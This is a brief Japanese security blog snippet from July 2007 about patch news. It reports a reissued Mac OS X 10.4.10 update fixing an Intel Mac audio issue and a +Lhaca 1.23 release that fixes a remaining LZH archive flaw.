About the security content of the Mac OS X 10.4.10 Update

 APPLE-SA-2007-07-02 Version 1.1 of Mac OS X 10.4.10 Update (Apple, 2007.07.03)。 Mac OS X 10.4.10 Update 1.1 が出たそうです。 Intel Mac でオーディオ関係の不具合があった模様。PowerPC は無問題です。


2007.07.02

追記

Beware of LZH

 +Lhaca 1.21 にもまだ欠陥が残っていたようで、これを修正した +Lhaca 1.23 が登場しています。


2007.07.01


[セキュリティホール memo]
私について